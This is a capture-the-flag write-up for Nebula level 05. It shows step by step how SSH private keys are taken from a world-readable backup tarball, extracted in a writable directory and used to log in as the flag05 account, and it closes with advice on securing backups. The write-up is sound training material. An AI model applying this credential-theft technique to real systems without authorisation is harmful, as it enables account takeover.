We start off with understanding what is being asked of us:
About
Check the flag05 home directory. You are looking for weak directory permissionsTo do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Source code
There is no source code available for this levelWith our information in hand, we log into the box as level05 and move to the /home/flag05 directory:
level05@nebula:~$ cd /home/flag05/ level05@nebula:/home/flag05$ ls -lah total 5.0K drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 . drwxr-xr-x 1 root root 60 2012-08-27 07:18 .. drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup -rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout -rw-r--r-- 1 flag05 flag05 3.3K 2011-05-18 02:54 .bashrc -rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh level05@nebula:/home/flag05$
We see a .backup directory that is owned by flag05 and world readable and executable. We dive in and check out its contents:
level05@nebula:/home/flag05/.backup$ ls -lah total 2.0K drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 . drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 .. -rw-rw-r-- 1 flag05 flag05 1.8K 2011-11-20 20:13 backup-19072011.tgz level05@nebula:/home/flag05/.backup$
We see a backup-19072011.tgz. Interesting. Let's untar it to see what it contains!
level05@nebula:/home/flag05/.backup$ tar -zxvf backup-19072011.tgz .ssh/ tar: .ssh: Cannot mkdir: Permission denied .ssh/id_rsa.pub tar: .ssh: Cannot mkdir: Permission denied tar: .ssh/id_rsa.pub: Cannot open: No such file or directory .ssh/id_rsa tar: .ssh: Cannot mkdir: Permission denied tar: .ssh/id_rsa: Cannot open: No such file or directory .ssh/authorized_keys tar: .ssh: Cannot mkdir: Permission denied tar: .ssh/authorized_keys: Cannot open: No such file or directory tar: Exiting with failure status due to previous errors level05@nebula:/home/flag05/.backup$
As suspected, we are unable to extract its contents because we do not have write access to the ./backup directory. However, the denied response shows that this backup contains SSH keys!
Our thoughts here is to copy this backup to a writable directory and extract its contents. Seeing that these are SSH keys and we are logged in as level05, we'll copy them down to that directory and untar it:
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz /home/level05/ level05@nebula:/home/flag05/.backup$ cd /home/level05/ level05@nebula:~$ tar -zxvf backup-19072011.tgz .ssh/ .ssh/id_rsa.pub .ssh/id_rsa .ssh/authorized_keys level05@nebula:~$
Excellent! Let's SSH in as the flag05 user and see if this works:
level05@nebula:~$ ssh flag05@localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts. _ __ __ __ / | / /__ / /_ __ __/ /___ _ / |/ / _ \/ __ \/ / / / / __ `/ / /| / __/ /_/ / /_/ / / /_/ / /_/ |_/\___/_.___/\__,_/_/\__,_/ exploit-exercises.com/nebula For level descriptions, please see the above URL. To log in, use the username of "levelXX" and password "levelXX", where XX is the level number. Currently there are 20 levels (00 - 19). Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686) * Documentation: https://help.ubuntu.com/ New release '12.04 LTS' available. Run 'do-release-upgrade' to upgrade to it. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. flag05@nebula:~$ id uid=994(flag05) gid=994(flag05) groups=994(flag05) flag05@nebula:~$ getflag You have successfully executed getflag on a target account flag05@nebula:~$
Success! This is a classic case where backups can get into the wrong hands. Make sure that a backup is secure and only accessible by the proper users.
Thanks for reading!
-geoda